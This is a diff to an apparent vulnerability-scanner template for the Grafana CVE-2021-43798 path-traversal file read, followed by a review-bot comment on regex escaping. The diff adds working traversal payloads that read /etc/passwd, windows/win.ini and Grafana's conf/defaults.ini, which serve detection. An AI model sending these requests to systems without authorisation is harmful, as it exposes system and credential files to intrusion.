diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index 73f3f78b8f..08d88ae9f4 100644
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-43798
 info:
 name: Grafana v8.x Arbitrary File Read
- author: z0ne,dhiyaneshDk
+ author: z0ne,dhiyaneshDk,j4vaovo
 severity: high
 description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
 reference:
@@ -24,16 +24,20 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini"
+ - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"
+ stop-at-first-match: true
 matchers-condition: and
 matchers:
 - type: regex
 regex:
 - "root:.*:0:0:"
+ - "for 16-bit app support"
+ - "socket = /tmp/grafana.sock"
+ condition: or
 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2022/02/28
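Review bot: The two patterns added under `regex:` in the second hunk are literal strings, so the `.` in `socket = /tmp/grafana.sock` acts as a wildcard, and with `condition: or` any one of the three patterns is accepted for a 200 response on any of the three paths. Escaping the dot in a single-quoted scalar keeps the match tight: `- 'socket = /tmp/grafana\.sock'` (a backslash-dot inside double quotes is not a valid YAML escape). A short comment above the new `conf/defaults.ini` entry, for example `# OS-independent fallback: Grafana's shipped defaults file`, would tell maintainers why its traversal depth differs from the other two paths; that reading is inferred from the pattern and is not stated in the commit. The `requests:` entry begins above the hunk.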